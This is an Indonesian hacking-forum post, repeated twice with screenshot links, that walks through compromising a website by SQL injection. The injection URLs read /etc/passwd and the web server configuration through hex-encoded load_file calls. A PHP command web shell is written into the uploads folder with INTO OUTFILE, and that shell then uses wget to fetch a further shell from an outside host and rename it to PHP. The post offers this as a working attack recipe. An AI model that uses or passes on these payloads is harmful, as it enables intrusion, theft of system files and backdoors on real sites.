06-01-2014, 11:38 PM
Assalamualaikum
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya
target
https://www.target.com/ajax_city_all_bra...ate=PANAJI
kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
error sqli, gunakan perintah order by 2--
sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error
sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
nahh root
syarat melakukan ini ada 2
For creating any file on the website with SQL queries two things are most important
1) Root Path ( We have it by ERROR
2) File Privilages for the Current MySQl User
we have File Privilages as well
artiin sendiri yah)
selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah
Coba sekarang kita masukan ini buat mendonwload bekdor
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
sekian dan terima kasih
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya
target
https://www.target.com/ajax_city_all_bra...ate=PANAJI
kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
Spoiler! :
![[Image: 2.jpg]](https://3.bp.blogspot.com/-r_eDZ4CbSIY/U4tBKDa7hJI/AAAAAAAAAoA/pcAfBgw6cXQ/s1600/2.jpg)
error sqli, gunakan perintah order by 2--
Spoiler! :
![[Image: 3.jpg]](https://1.bp.blogspot.com/-ws4lR4n_8HA/U4tBaNIUv_I/AAAAAAAAAoI/K7K53UEMgL4/s1600/3.jpg)
sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error
Spoiler! :
![[Image: 4.jpg]](https://3.bp.blogspot.com/-dQ4kAohOltw/U4tB6plUzVI/AAAAAAAAAoQ/zG64VNdU2lA/s1600/4.jpg)
sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
Spoiler! :
![[Image: 5.jpg]](https://4.bp.blogspot.com/-ahz1U2SMtIo/U4tCMUXV5NI/AAAAAAAAAoY/uWKgD3VOrTQ/s1600/5.jpg)
liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
Spoiler! :
![[Image: 6.jpg]](https://3.bp.blogspot.com/-FJAqRkaYtbw/U4tCc_wLHYI/AAAAAAAAAog/aCUVRpouk6o/s1600/6.jpg)
nahh root
syarat melakukan ini ada 2
For creating any file on the website with SQL queries two things are most important
1) Root Path ( We have it by ERROR
2) File Privilages for the Current MySQl User
we have File Privilages as well artiin sendiri yah
)selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
Spoiler! :
![[Image: 7.jpg]](https://1.bp.blogspot.com/-06vPzRpVL5Y/U4tC-TEKlnI/AAAAAAAAAoo/IS1kd4qwudw/s1600/7.jpg)
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
Spoiler! :
![[Image: 8.jpg]](https://3.bp.blogspot.com/-QqcgqTbqYVc/U4tDtrPnhnI/AAAAAAAAAow/gf2Cxu7jMus/s1600/8.jpg)
sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah
Spoiler! :
![[Image: 9.jpg]](https://4.bp.blogspot.com/-DfvP7RUOfgE/U4tEH7o9xhI/AAAAAAAAAo4/FQPuNxKh8hM/s1600/9.jpg)
Coba sekarang kita masukan ini buat mendonwload bekdor
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Spoiler! :
![[Image: 10.jpg]](https://3.bp.blogspot.com/-uHCw4YIdyvA/U4tEiBzi1MI/AAAAAAAAApA/3PBC1pAA0Dc/s1600/10.jpg)
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
Spoiler! :
![[Image: 12.jpg]](https://1.bp.blogspot.com/-YZvzfGZkIFg/U4tFHbBF_pI/AAAAAAAAApI/bdhutifYWeY/s1600/12.jpg)
sekian dan terima kasih
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
